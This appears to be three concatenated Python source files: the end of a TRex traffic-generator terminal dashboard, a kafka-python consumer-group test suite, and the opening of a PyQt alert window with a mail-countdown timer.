# if any/some ports can be resumed
if set(self.get_showed_ports()) & set(self.client.get_paused_ports()):
allowed['r'] = self.key_actions['r']
# if any/some ports are transmitting - support those actions
if set(self.get_showed_ports()) & set(self.client.get_transmitting_ports()):
allowed['p'] = self.key_actions['p']
return allowed
######### actions
def action_pause (self):
ports = list_intersect(self.get_showed_ports(), self.client.get_transmitting_ports())
try:
rc = self.client.pause(ports = ports)
except TRexError:
pass
return ""
def action_resume (self):
ports = list_intersect(self.get_showed_ports(), self.client.get_paused_ports())
try:
self.client.resume(ports = ports)
except TRexError:
pass
return ""
def action_reset_view (self):
self.toggle_filter.reset()
return ""
def action_show_owned (self):
self.toggle_filter.reset()
self.toggle_filter.toggle_items(*self.client.get_acquired_ports())
return ""
def action_show_all (self):
self.toggle_filter.reset()
self.toggle_filter.toggle_items(*self.client.get_all_ports())
return ""
def action_clear (self):
self.client.clear_stats(self.toggle_filter.filter_items())
return "cleared all stats"
def action_toggle_port(self, port_id):
def action_toggle_port_x():
self.toggle_filter.toggle_item(port_id)
return ""
return action_toggle_port_x
# streams stats
class TrexTUIStreamsStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUIStreamsStats, self).__init__(mng, "sstats")
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
self.client._show_streams_stats(buffer = buffer)
def get_key_actions (self):
return self.key_actions
def action_clear (self):
self.client.pgid_stats.clear_stats()
return ""
# latency stats
class TrexTUILatencyStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUILatencyStats, self).__init__(mng, "lstats")
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
self.key_actions['h'] = {'action': self.action_toggle_histogram, 'legend': 'histogram toggle', 'show': True}
self.is_histogram = False
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
if self.is_histogram:
self.client._show_latency_histogram(buffer = buffer)
else:
self.client._show_latency_stats(buffer = buffer)
def get_key_actions (self):
return self.key_actions
def action_toggle_histogram (self):
self.is_histogram = not self.is_histogram
return ""
def action_clear (self):
self.client.pgid_stats.clear_stats()
return ""
class TrexTUIAstfTrafficStats(TrexTUIPanel):
def __init__(self, mng):
super(TrexTUIAstfTrafficStats, self).__init__(mng, "astats")
self.start_row = 0
self.max_lines = TrexTUI.MIN_ROWS - 16 # 16 is size of panels below and above
self.num_lines = 0
self.tgid = 0
self.is_sum = True if self.client.is_dynamic else False
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': Predicate(lambda : self.tgid == 0)}
self.key_actions['Up'] = {'action': self.action_up, 'legend': 'scroll up', 'show': True}
self.key_actions['Down'] = {'action': self.action_down, 'legend': 'scroll down', 'show': True}
self.key_actions['Left'] = {'action': self.action_left, 'legend': 'previous TG', 'show': True}
self.key_actions['Right'] = {'action': self.action_right, 'legend': 'next TG', 'show': True}
def show(self, buffer):
self.client._show_global_stats(buffer = buffer)
buf = StringIO()
have_into = False
try:
self.client._show_traffic_stats(False, buffer = buf, tgid = self.tgid, is_sum = self.is_sum)
have_into = True
except ASTFErrorBadTG:
self.tgid = 0
if have_into:
buf.seek(0)
out_lines = buf.readlines()
self.num_lines = len(out_lines)
buffer.write(''.join(out_lines[self.start_row:self.start_row+self.max_lines]))
buffer.write('\n')
def get_key_actions(self):
return self.key_actions
def action_clear(self):
self.client.clear_stats()
return ""
def action_up(self):
if self.start_row > self.num_lines:
self.start_row = self.num_lines
elif self.start_row > 0:
self.start_row -= 1
def action_down(self):
if self.start_row < self.num_lines - self.max_lines:
self.start_row += 1
def action_left(self):
if self.tgid > 0:
self.tgid -= 1
def action_right(self):
if self.tgid < self.client._get_num_of_tgids():
self.tgid += 1
# ASTF latency stats
class TrexTUIAstfLatencyStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUIAstfLatencyStats, self).__init__(mng, 'lstats')
self.key_actions = OrderedDict()
self.key_actions['v'] = {'action': self.action_toggle_view, 'legend': self.get_next_view, 'show': True}
self.views = [
{'name': 'main latency', 'func': self.client._show_latency_stats},
{'name': 'histogram', 'func': self.client._show_latency_histogram},
{'name': 'counters', 'func': self.client._show_latency_counters},
]
self.view_index = 0
self.next_view_index = 1
def get_next_view(self):
return "view toggle to '%s'" % self.views[self.next_view_index]['name']
def show(self, buffer):
self.client._show_global_stats(buffer = buffer)
self.views[self.view_index]['func'](buffer = buffer)
def get_key_actions (self):
return self.key_actions
def action_toggle_view(self):
self.view_index = self.next_view_index
self.next_view_index = (1 + self.next_view_index) % len(self.views)
return ""
# utilization stats
class TrexTUIUtilizationStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUIUtilizationStats, self).__init__(mng, "ustats")
self.key_actions = {}
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
self.client._show_cpu_util(buffer = buffer)
self.client._show_mbuf_util(buffer = buffer)
def get_key_actions (self):
return self.key_actions
# log
class TrexTUILog():
def __init__ (self):
self.log = []
def add_event (self, msg):
self.log.append("[{0}] {1}".format(str(datetime.datetime.now().time()), msg))
def show (self, buffer, max_lines = 4):
cut = len(self.log) - max_lines
if cut < 0:
cut = 0
print(format_text("\nLog:", 'bold', 'underline'), file = buffer)
for msg in self.log[cut:]:
print(msg, file = buffer)
# a predicate to wrap function as a bool
class Predicate(object):
def __init__ (self, func):
self.func = func
def __nonzero__ (self):
return True if self.func() else False
def __bool__ (self):
return True if self.func() else False
# Panels manager (contains server panels)
class TrexTUIPanelManager():
def __init__ (self, tui):
self.tui = tui
self.client = tui.client
self.ports = self.client.get_all_ports()
self.locked = False
self.panels = {}
self.panels['dashboard'] = TrexTUIDashBoard(self)
self.panels['ustats'] = TrexTUIUtilizationStats(self)
self.key_actions = OrderedDict()
# we allow console only when ports are acquired
self.key_actions['ESC'] = {'action': self.action_none, 'legend': 'console', 'show': Predicate(lambda : not self.locked)}
self.key_actions['q'] = {'action': self.action_none, 'legend': 'quit', 'show': True}
self.key_actions['d'] = {'action': self.action_show_dash, 'legend': 'dashboard', 'show': True}
self.key_actions['u'] = {'action': self.action_show_ustats, 'legend': 'util', 'show': True}
# HACK - FIX THIS
# stateless specific panels
if self.client.get_mode() == "STL":
self.panels['sstats'] = TrexTUIStreamsStats(self)
self.panels['lstats'] = TrexTUILatencyStats(self)
self.key_actions['s'] = {'action': self.action_show_sstats, 'legend': 'streams', 'show': True}
self.key_actions['l'] = {'action': self.action_show_lstats, 'legend': 'latency', 'show': True}
elif self.client.get_mode() == "ASTF":
self.panels['astats'] = TrexTUIAstfTrafficStats(self)
self.panels['lstats'] = TrexTUIAstfLatencyStats(self)
self.key_actions['t'] = {'action': self.action_show_astats, 'legend': 'astf', 'show': True}
self.key_actions['l'] = {'action': self.action_show_lstats, 'legend': 'latency', 'show': True}
# start with dashboard
self.main_panel = self.panels['dashboard']
# log object
self.log = TrexTUILog()
self.generate_legend()
self.conn_bar = SimpleBar('status: ', ['|','/','-','\\'])
self.dis_bar = SimpleBar('status: ', ['X', ' '])
self.show_log = False
def generate_legend(self):
self.legend = "\n{:<12}".format("browse:")
for k, v in self.key_actions.items():
if v['show']:
try:
legend = v['legend']()
except TypeError:
legend = v['legend']
x = "'{0}' - {1}, ".format(k, legend)
if v.get('color'):
self.legend += "{:}".format(format_text(x, v.get('color')))
else:
self.legend += "{:}".format(x)
self.legend += "\n{:<12}".format(self.main_panel.get_name() + ":")
for k, v in self.main_panel.get_key_actions().items():
if v['show']:
try:
legend = v['legend']()
except TypeError:
legend = v['legend']
x = "'{0}' - {1}, ".format(k, legend)
if v.get('color'):
self.legend += "{:}".format(format_text(x, v.get('color')))
else:
self.legend += "{:}".format(x)
def print_connection_status (self, buffer):
if self.tui.get_state() == self.tui.STATE_ACTIVE:
self.conn_bar.show(buffer = buffer)
else:
self.dis_bar.show(buffer = buffer)
def print_legend (self, buffer):
print(format_text(self.legend, 'bold'), file = buffer)
# on window switch or turn on / off of the TUI we call this
def init (self, show_log = False, locked = False):
self.show_log = show_log
self.locked = locked
self.generate_legend()
def show (self, show_legend, buffer):
try:
self.main_panel.show(buffer)
except:
if self.client.is_connected():
raise
self.print_connection_status(buffer)
if show_legend:
self.generate_legend()
self.print_legend(buffer)
if self.show_log:
self.log.show(buffer)
def handle_key (self, ch):
# check for the manager registered actions
if ch in self.key_actions:
msg = self.key_actions[ch]['action']()
# check for main panel actions
elif ch in self.main_panel.get_key_actions():
msg = self.main_panel.get_key_actions()[ch]['action']()
else:
return False
self.generate_legend()
return True
#if msg == None:
# return False
#else:
# if msg:
# self.log.add_event(msg)
# return True
# actions
def action_none (self):
return None
def action_show_dash (self):
self.main_panel = self.panels['dashboard']
self.init(self.show_log)
return ""
def action_show_port (self, port_id):
def action_show_port_x ():
self.main_panel = self.panels['port {0}'.format(port_id)]
self.init()
return ""
return action_show_port_x
def action_show_sstats (self):
self.main_panel = self.panels['sstats']
self.init(self.show_log)
return ""
def action_show_astats (self):
self.main_panel = self.panels['astats']
self.init(self.show_log)
return ""
def action_show_lstats (self):
self.main_panel = self.panels['lstats']
self.init(self.show_log)
return ""
def action_show_ustats(self):
self.main_panel = self.panels['ustats']
self.init(self.show_log)
return ""
# ScreenBuffer is a class designed to
# avoid inline delays when reprinting the screen
class ScreenBuffer():
def __init__ (self, redraw_cb):
self.snapshot = ''
self.lock = threading.Lock()
self.redraw_cb = redraw_cb
self.update_flag = False
def start (self):
self.active = True
self.t = threading.Thread(target = self.__handler)
self.t.setDaemon(True)
self.t.start()
def stop (self):
self.active = False
self.t.join()
# request an update
def update (self):
self.update_flag = True
# fetch the screen, return None if no new screen exists yet
def get (self):
if not self.snapshot:
return None
# we have a snapshot - fetch it
with self.lock:
x = self.snapshot
self.snapshot = None
return x
def __handler (self):
while self.active:
if self.update_flag:
self.__redraw()
time.sleep(0.01)
# redraw the next screen
def __redraw (self):
buffer = StringIO()
self.redraw_cb(buffer)
with self.lock:
self.snapshot = buffer
self.update_flag = False
# a policer class to make sure no too-fast redraws
# occurs - it filters fast bursts of redraws
class RedrawPolicer():
def __init__ (self, rate):
self.ts = 0
self.marked = False
self.rate = rate
self.force = False
def mark_for_redraw (self, force = False):
self.marked = True
if force:
self.force = True
def should_redraw (self):
dt = time.time() - self.ts
return self.force or (self.marked and (dt > self.rate))
def reset (self, restart = False):
self.ts = time.time()
self.marked = restart
self.force = False
# shows a textual top style window
class TrexTUI():
STATE_ACTIVE = 0
STATE_LOST_CONT = 1
STATE_RECONNECT = 2
is_graph = False
_ref_cnt = 0
MIN_ROWS = 45
MIN_COLS = 111
class ScreenSizeException(Exception):
def __init__ (self, cols, rows):
msg = "TUI requires console screen size of at least {0}x{1}, current is {2}x{3}".format(TrexTUI.MIN_COLS,
TrexTUI.MIN_ROWS,
cols,
rows)
super(TrexTUI.ScreenSizeException, self).__init__(msg)
def __init__ (self, console):
self.console = console
self.client = console.client
self.tui_global_lock = threading.Lock()
self.pm = TrexTUIPanelManager(self)
self.sb = ScreenBuffer(self.redraw_handler)
TrexTUI._ref_cnt += 1
def __del__(self):
TrexTUI._ref_cnt -= 1
@classmethod
def has_instance(cls):
return cls._ref_cnt > 0
def redraw_handler (self, buffer):
# this is executed by the screen buffer - should be protected against TUI commands
with self.tui_global_lock:
self.pm.show(show_legend = self.async_keys.is_legend_mode(), buffer = buffer)
def clear_screen (self, lines = 50):
# reposition the cursor
sys.stdout.write("\x1b[0;0H")
# clear all lines
for i in range(lines):
sys.stdout.write("\x1b[0K")
if i < (lines - 1):
sys.stdout.write("\n")
# reposition the cursor
sys.stdout.write("\x1b[0;0H")
def show (self, client, save_console_history, show_log = False, locked = False):
rows, cols = os.popen('stty size', 'r').read().split()
if (int(rows) < TrexTUI.MIN_ROWS) or (int(cols) < TrexTUI.MIN_COLS):
raise self.ScreenSizeException(rows = rows, cols = cols)
with AsyncKeys(client, self.console, save_console_history, self.tui_global_lock, locked) as async_keys:
sys.stdout.write("\x1bc")
self.async_keys = async_keys
self.show_internal(show_log, locked)
def show_internal (self, show_log, locked):
self.pm.init(show_log, locked)
self.state = self.STATE_ACTIVE
self.time_ts = None
# create print policers
self.full_redraw = RedrawPolicer(0.5)
self.keys_redraw = RedrawPolicer(0.05)
self.full_redraw.mark_for_redraw()
try:
self.sb.start()
while True:
# draw and handle user input
status = self.async_keys.tick(self.pm)
# prepare the next frame
self.prepare(status)
time.sleep(0.01)
self.draw_screen()
with self.tui_global_lock:
self.handle_state_machine()
except TUIQuit:
print("\nExiting TUI...")
except KeyboardInterrupt:
print("\nExiting TUI...")
finally:
self.sb.stop()
print("")
# handle state machine
def handle_state_machine (self):
# regular state
if self.state == self.STATE_ACTIVE:
# if no connectivity - move to lost connecitivty
if not self.client.is_connected():
self.state = self.STATE_LOST_CONT
self.time_ts = time.time()
# lost connectivity
elif self.state == self.STATE_LOST_CONT:
# if the connection is alive (some data is arriving on the async channel)
# try to reconnect
if (time.time() - self.time_ts) > 5.0:
# move to state reconnect
self.state = self.STATE_RECONNECT
# restored connectivity - try to reconnect
elif self.state == self.STATE_RECONNECT:
try:
self.client.connect()
self.client.acquire()
self.state = self.STATE_ACTIVE
except TRexError:
self.state = self.STATE_LOST_CONT
self.time_ts = time.time()
# logic before printing
def prepare (self, status):
if status == AsyncKeys.STATUS_REDRAW_ALL:
self.full_redraw.mark_for_redraw(force = True)
elif status == AsyncKeys.STATUS_REDRAW_KEYS:
self.keys_redraw.mark_for_redraw()
if self.full_redraw.should_redraw():
self.sb.update()
self.full_redraw.reset(restart = True)
return
# draw once
def draw_screen (self):
# check for screen buffer's new screen
x = self.sb.get()
# we have a new screen to draw
if x:
self.clear_screen()
self.async_keys.draw(x)
sys.stdout.write(x.getvalue())
sys.stdout.flush()
# maybe we need to redraw the keys
elif self.keys_redraw.should_redraw():
sys.stdout.write("\x1b[4A")
self.async_keys.draw(sys.stdout)
sys.stdout.flush()
# reset the policer for next time
self.keys_redraw.reset()
def get_state (self):
return self.state
class TokenParser(object):
def __init__ (self, seq):
self.buffer = list(seq)
def pop (self):
return self.buffer.pop(0)
def peek (self):
if not self.buffer:
return None
return self.buffer[0]
def next_token (self):
if not self.peek():
return None
token = self.pop()
# special chars
if token == '\x1b':
while self.peek():
token += self.pop()
return token
def parse (self):
tokens = []
while True:
token = self.next_token()
if token == None:
break
tokens.append(token)
return tokens
# handles async IO
class AsyncKeys:
MODE_LEGEND = 1
MODE_CONSOLE = 2
STATUS_NONE = 0
STATUS_REDRAW_KEYS = 1
STATUS_REDRAW_ALL = 2
def __init__ (self, client, console, save_console_history, tui_global_lock, locked = False):
self.tui_global_lock = tui_global_lock
self.engine_console = AsyncKeysEngineConsole(self, console, client, save_console_history)
self.engine_legend = AsyncKeysEngineLegend(self)
self.locked = locked
if locked:
self.engine = self.engine_legend
self.locked = True
else:
self.engine = self.engine_console
self.locked = False
def __enter__ (self):
# init termios
self.old_settings = termios.tcgetattr(sys.stdin)
new_settings = termios.tcgetattr(sys.stdin)
new_settings[3] = new_settings[3] & ~(termios.ECHO | termios.ICANON) # lflags
new_settings[6][termios.VMIN] = 0 # cc
new_settings[6][termios.VTIME] = 0 # cc
# huge buffer - no print without flush
sys.stdout = open('/dev/stdout', 'w', TrexTUI.MIN_COLS * TrexTUI.MIN_COLS * 2)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, new_settings)
return self
def __exit__ (self, type, value, traceback):
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, self.old_settings)
# restore sys.stdout
sys.stdout.close()
sys.stdout = sys.__stdout__
def is_legend_mode (self):
return self.engine.get_type() == AsyncKeys.MODE_LEGEND
def is_console_mode (self):
return self.engine.get_type == AsyncKeys.MODE_CONSOLE
def switch (self):
if self.is_legend_mode():
self.engine = self.engine_console
else:
self.engine = self.engine_legend
def handle_token (self, token, pm):
# ESC for switch
if token == '\x1b':
if not self.locked:
self.switch()
return self.STATUS_REDRAW_ALL
# EOF (ctrl + D)
if token == '\x04':
raise TUIQuit()
# pass tick to engine
return self.engine.tick(token, pm)
def tick (self, pm):
rc = self.STATUS_NONE
# fetch the stdin buffer
seq = os.read(sys.stdin.fileno(), 1024).decode('ascii', errors = 'ignore')
if not seq:
return self.STATUS_NONE
# parse all the tokens from the buffer
tokens = TokenParser(seq).parse()
# process them
for token in tokens:
token_rc = self.handle_token(token, pm)
rc = max(rc, token_rc)
return rc
def draw (self, buffer):
self.engine.draw(buffer)
# Legend engine
class AsyncKeysEngineLegend:
def __init__ (self, async_):
self.async_ = async_
def get_type (self):
return self.async_.MODE_LEGEND
def tick (self, seq, pm):
if seq == 'q':
raise TUIQuit()
if len(seq) > 1:
if seq == '\x1b\x5b\x41': # scroll up
pm.handle_key('Up')
if seq == '\x1b\x5b\x42': # scroll down
pm.handle_key('Down')
if seq == '\x1b\x5b\x43': # scroll right
pm.handle_key('Right')
if seq == '\x1b\x5b\x44': # scroll left
pm.handle_key('Left')
return AsyncKeys.STATUS_NONE
rc = pm.handle_key(seq)
return AsyncKeys.STATUS_REDRAW_ALL if rc else AsyncKeys.STATUS_NONE
def draw (self, buffer):
pass
# console engine
class AsyncKeysEngineConsole:
def __init__ (self, async_, console, client, save_console_history):
self.async_ = async_
self.lines = deque(maxlen = 100)
self.generate_prompt = console.generate_prompt
self.save_console_history = save_console_history
self.ac = client.get_console_methods()
self.ac.update({'quit' : self.action_quit,
'q' : self.action_quit,
'exit' : self.action_quit,
'help' : self.action_help,
'?' : self.action_help})
# fetch readline history and add relevants
for i in range(1, readline.get_current_history_length()):
cmd = readline.get_history_item(i)
if cmd.strip() and cmd.split()[0] in self.ac:
self.lines.appendleft(CmdLine(cmd))
# new line
self.lines.appendleft(CmdLine(''))
self.line_index = 0
self.last_status = ''
def action_quit (self, _):
raise TUIQuit()
def action_help (self, _):
return ' '.join([format_text(cmd, 'bold') for cmd in self.ac.keys()])
def get_type (self):
return self.async_.MODE_CONSOLE
def handle_escape_char (self, seq):
# up
if seq == '\x1b[A':
self.line_index = min(self.line_index + 1, len(self.lines) - 1)
# down
elif seq == '\x1b[B':
self.line_index = max(self.line_index - 1, 0)
# left
elif seq == '\x1b[D':
self.lines[self.line_index].go_left()
# right
elif seq == '\x1b[C':
self.lines[self.line_index].go_right()
# del
elif seq == '\x1b[3~':
self.lines[self.line_index].del_key()
# home
elif seq in ('\x1b[H', '\x1b\x4fH'):
self.lines[self.line_index].home_key()
# end
elif seq in ('\x1b[F', '\x1b\x4fF'):
self.lines[self.line_index].end_key()
# Alt + Backspace
elif seq == '\x1b\x7f':
pos = orig_pos = self.lines[self.line_index].cursor_index
cut_to_pos = None
line = self.lines[self.line_index].get()
while pos >= 1:
if pos == 1:
cut_to_pos = 0
elif line[pos - 1] != ' ' and line[pos - 2] == ' ':
cut_to_pos = pos - 1
break
pos -= 1
if cut_to_pos is not None:
self.lines[self.line_index].set(line[:cut_to_pos] + line[orig_pos:], cut_to_pos)
# Alt + Left or Ctrl + Left
elif seq in ('\x1b[\x31\x3B\x33\x44', '\x1b[\x31\x3B\x35\x44'):
pos = self.lines[self.line_index].cursor_index
move_to_pos = None
line = self.lines[self.line_index].get()
while pos >= 1:
if pos == 1:
move_to_pos = 0
elif line[pos - 1] != ' ' and line[pos - 2] == ' ':
move_to_pos = pos - 1
break
pos -= 1
if move_to_pos is not None:
self.lines[self.line_index].cursor_index = move_to_pos
# Alt + Right or Ctrl + Right
elif seq in ('\x1b[\x31\x3B\x33\x43', '\x1b[\x31\x3B\x35\x43'):
pos = self.lines[self.line_index].cursor_index
move_to_pos = None
line = self.lines[self.line_index].get()
while pos <= len(line) - 1:
if pos == len(line) - 1:
move_to_pos = len(line)
elif line[pos] != ' ' and line[pos + 1] == ' ':
move_to_pos = pos + 1
break
pos += 1
if move_to_pos is not None:
self.lines[self.line_index].cursor_index = move_to_pos
# PageUp
elif seq == '\x1b\x5b\x35\x7e':
line_part = self.lines[self.line_index].get()[:self.lines[self.line_index].cursor_index]
index = self.line_index
while index < len(self.lines) - 1:
index += 1
if self.lines[index].get().startswith(line_part):
self.lines[index].cursor_index = self.lines[self.line_index].cursor_index
self.line_index = index
break
# PageDown
elif seq == '\x1b\x5b\x36\x7e':
line_part = self.lines[self.line_index].get()[:self.lines[self.line_index].cursor_index]
index = self.line_index
while index > 0:
index -= 1
if self.lines[index].get().startswith(line_part):
self.lines[index].cursor_index = self.lines[self.line_index].cursor_index
self.line_index = index
break
# unknown key
else:
return AsyncKeys.STATUS_NONE
return AsyncKeys.STATUS_REDRAW_KEYS
def tick (self, seq, _):
# handle escape chars
if len(seq) > 1:
return self.handle_escape_char(seq)
# handle each char
for ch in seq:
return self.handle_single_key(ch)
def handle_single_key (self, ch):
# newline
if ch == '\n':
self.handle_cmd()
# backspace
elif ch == '\x7f':
self.lines[self.line_index].backspace()
# TAB
elif ch == '\t':
tokens = self.lines[self.line_index].get().split()
if not tokens:
return
if len(tokens) == 1:
self.handle_tab_names(tokens[0])
else:
self.handle_tab_files(tokens)
# simple char
else:
self.lines[self.line_index] += ch
return AsyncKeys.STATUS_REDRAW_KEYS
# handle TAB key for completing function names
def handle_tab_names (self, cur):
matching_cmds = [x for x in self.ac if x.startswith(cur)]
common = os.path.commonprefix([x for x in self.ac if x.startswith(cur)])
if common:
if len(matching_cmds) == 1:
self.lines[self.line_index].set(common + ' ')
self.last_status = ''
else:
self.lines[self.line_index].set(common)
self.last_status = 'ambigious: '+ ' '.join([format_text(cmd, 'bold') for cmd in matching_cmds])
# handle TAB for completing filenames
def handle_tab_files (self, tokens):
# only commands with files
if tokens[0] not in {'start', 'push'}:
return
# '-f' with no parameters - no partial and use current dir
if tokens[-1] == '-f':
partial = ''
d = '.'
# got a partial path
elif tokens[-2] == '-f':
partial = tokens.pop()
# check for dirs
dirname, basename = os.path.dirname(partial), os.path.basename(partial)
if os.path.isdir(dirname):
d = dirname
partial = basename
else:
d = '.'
else:
return
# fetch all dirs and files matching wildcard
files = []
for x in os.listdir(d):
if os.path.isdir(os.path.join(d, x)):
files.append(x + '/')
elif x.endswith( ('.py', 'yaml', 'pcap', 'cap', 'erf') ):
files.append(x)
# dir might not have the files
if not files:
self.last_status = format_text('no loadble files under path', 'bold')
return
# find all the matching files
matching_files = [x for x in files if x.startswith(partial)] if partial else files
# do we have a longer common than partial ?
common = os.path.commonprefix([x for x in files if x.startswith(partial)])
if not common:
common = partial
tokens.append(os.path.join(d, common) if d != '.' else common)
# reforge the line
newline = ' '.join(tokens)
if len(matching_files) == 1:
if os.path.isfile(tokens[-1]):
newline += ' '
self.lines[self.line_index].set(newline)
self.last_status = ''
else:
self.lines[self.line_index].set(newline)
self.last_status = ' '.join([format_text(f, 'bold') for f in matching_files[:5]])
if len(matching_files) > 5:
self.last_status += ' ... [{0} more matches]'.format(len(matching_files) - 5)
def split_cmd (self, cmd):
s = cmd.split(' ', 1)
op = s[0]
param = s[1] if len(s) == 2 else ''
return op, param
def handle_cmd (self):
cmd = self.lines[self.line_index].get().strip()
if not cmd:
return
op, param = self.split_cmd(cmd)
func = self.ac.get(op)
if func:
with self.async_.tui_global_lock:
func_rc = func(param)
# take out the empty line
empty_line = self.lines.popleft()
assert(empty_line.ro_line == '')
if not self.lines or self.lines[0].ro_line != cmd:
self.lines.appendleft(CmdLine(cmd))
# back in
self.lines.appendleft(empty_line)
self.line_index = 0
readline.add_history(cmd)
self.save_console_history()
# back to readonly
for line in self.lines:
line.invalidate()
assert(self.lines[0].modified == False)
color = None
if not func:
self.last_status = "unknown command: '{0}'".format(format_text(cmd.split()[0], 'bold'))
else:
# internal commands
if isinstance(func_rc, str):
self.last_status = func_rc
# RC response
else:
# success
if func_rc is None:
self.last_status = format_text("[OK]", 'green')
# errors
else:
err_msgs = ascii_split(str(func_rc))
if not err_msgs:
err_msgs = ['Unknown error']
self.last_status = format_text(clear_formatting(err_msgs[0]), 'red')
if len(err_msgs) > 1:
self.last_status += " [{0} more errors messages]".format(len(err_msgs) - 1)
color = 'red'
# trim too long lines
if ansi_len(self.last_status) > TrexTUI.MIN_COLS:
self.last_status = format_text(self.last_status[:TrexTUI.MIN_COLS] + "...", color, 'bold')
def draw (self, buffer):
buffer.write("\nPress 'ESC' for navigation panel...\n")
buffer.write("status: \x1b[0K{0}\n".format(self.last_status))
buffer.write("\n{0}\x1b[0K".format(self.generate_prompt(prefix = 'tui')))
self.lines[self.line_index].draw(buffer)
# a readline alike command line - can be modified during edit
class CmdLine(object):
def __init__ (self, line):
self.ro_line = line
self.w_line = None
self.modified = False
self.cursor_index = len(line)
def get (self):
if self.modified:
return self.w_line
else:
return self.ro_line
def set (self, line, cursor_pos = None):
self.w_line = line
self.modified = True
if cursor_pos is None:
self.cursor_index = len(self.w_line)
else:
self.cursor_index = cursor_pos
def __add__ (self, other):
assert(0)
def __str__ (self):
return self.get()
def __iadd__ (self, other):
self.set(self.get()[:self.cursor_index] + other + self.get()[self.cursor_index:],
cursor_pos = self.cursor_index + len(other))
return self
def backspace (self):
if self.cursor_index == 0:
return
self.set(self.get()[:self.cursor_index - 1] + self.get()[self.cursor_index:],
self.cursor_index - 1)
def del_key (self):
if self.cursor_index == len(self.get()):
return
self.set(self.get()[:self.cursor_index] + self.get()[self.cursor_index + 1:],
self.cursor_index)
def home_key (self):
self.cursor_index = 0
def end_key (self):
self.cursor_index = len(self.get())
def invalidate (self):
self.modified = False
self.w_line = None
self.cursor_index = len(self.ro_line)
def go_left (self):
self.cursor_index = max(0, self.cursor_index - 1)
def go_right (self):
self.cursor_index = min(len(self.get()), self.cursor_index + 1)
def draw (self, buffer):
buffer.write(self.get())
buffer.write('\b' * (len(self.get()) - self.cursor_index))
|
test_consumer_group.py | import collections
import logging
import threading
import time
import pytest
import six
from kafka import SimpleClient
from kafka.conn import ConnectionStates
from kafka.consumer.group import KafkaConsumer
from kafka.structs import TopicPartition
from test.conftest import version
from test.testutil import random_string
def get_connect_str(kafka_broker):
return kafka_broker.host + ':' + str(kafka_broker.port)
@pytest.fixture
def simple_client(kafka_broker):
return SimpleClient(get_connect_str(kafka_broker))
@pytest.fixture
def topic(simple_client):
topic = random_string(5)
simple_client.ensure_topic_exists(topic)
return topic
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_consumer(kafka_broker, version):
# 0.8.2 brokers need a topic to function well
if version >= (0, 8, 2) and version < (0, 9):
topic(simple_client(kafka_broker))
consumer = KafkaConsumer(bootstrap_servers=get_connect_str(kafka_broker))
consumer.poll(500)
assert len(consumer._client._conns) > 0
node_id = list(consumer._client._conns.keys())[0]
assert consumer._client._conns[node_id].state is ConnectionStates.CONNECTED
@pytest.mark.skipif(version() < (0, 9), reason='Unsupported Kafka Version')
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_group(kafka_broker, topic):
num_partitions = 4
connect_str = get_connect_str(kafka_broker)
consumers = {}
stop = {}
threads = {}
messages = collections.defaultdict(list)
group_id = 'test-group-' + random_string(6)
def consumer_thread(i):
assert i not in consumers
assert i not in stop
stop[i] = threading.Event()
consumers[i] = KafkaConsumer(topic,
bootstrap_servers=connect_str,
group_id=group_id,
heartbeat_interval_ms=500)
while not stop[i].is_set():
for tp, records in six.itervalues(consumers[i].poll(100)):
messages[i][tp].extend(records)
consumers[i].close()
del consumers[i]
del stop[i]
num_consumers = 4
for i in range(num_consumers):
t = threading.Thread(target=consumer_thread, args=(i,))
t.start()
threads[i] = t
try:
timeout = time.time() + 35
while True:
for c in range(num_consumers):
# Verify all consumers have been created
if c not in consumers:
break
# Verify all consumers have an assignment
elif not consumers[c].assignment():
break
# If all consumers exist and have an assignment
else:
# Verify all consumers are in the same generation
# then log state and break while loop
generations = set([consumer._coordinator.generation
for consumer in list(consumers.values())])
# New generation assignment is not complete until
# coordinator.rejoining = False
rejoining = any([consumer._coordinator.rejoining
for consumer in list(consumers.values())])
if not rejoining and len(generations) == 1:
for c, consumer in list(consumers.items()):
logging.info("[%s] %s %s: %s", c,
consumer._coordinator.generation,
consumer._coordinator.member_id,
consumer.assignment())
break
assert time.time() < timeout, "timeout waiting for assignments"
group_assignment = set()
for c in range(num_consumers):
assert len(consumers[c].assignment()) != 0
assert set.isdisjoint(consumers[c].assignment(), group_assignment)
group_assignment.update(consumers[c].assignment())
assert group_assignment == set([
TopicPartition(topic, partition)
for partition in range(num_partitions)])
finally:
for c in range(num_consumers):
stop[c].set()
threads[c].join()
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_paused(kafka_broker, topic):
consumer = KafkaConsumer(bootstrap_servers=get_connect_str(kafka_broker))
topics = [TopicPartition(topic, 1)]
consumer.assign(topics)
assert set(topics) == consumer.assignment()
assert set() == consumer.paused()
consumer.pause(topics[0])
assert set([topics[0]]) == consumer.paused()
consumer.resume(topics[0])
assert set() == consumer.paused()
consumer.unsubscribe()
assert set() == consumer.paused()
|
AlertSettings.py | # -*- coding: utf-8 -*-
from PyQt5 import QtCore, QtGui, QtWidgets
import pygame
import pymysql
from PyQt5.QtCore import QTimer
import time
import smtplib
import os
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
import multiprocessing
import datetime
class Ui_Alert3(object):
update = 1
count = 0
tw = time.time()
flag = False
def __init__(self, num):
self.num = num
self.timer = QTimer()
# set timer timeout callback function
self.timer.timeout.connect(self.viewcam)
# set control_bt callback clicked function
def viewcam(self):
t1 = time.time()
print('###############',self.num)
if t1 - self.tw >= self.update:
self.count += 1
con = self.num - self.count
self.btn_sndmail.setText('Send Mail ' + str(con))
print(con)
if con == 0:
print('Send Mail')
self.count = 0
self.btn_sndmail.setText('Send')
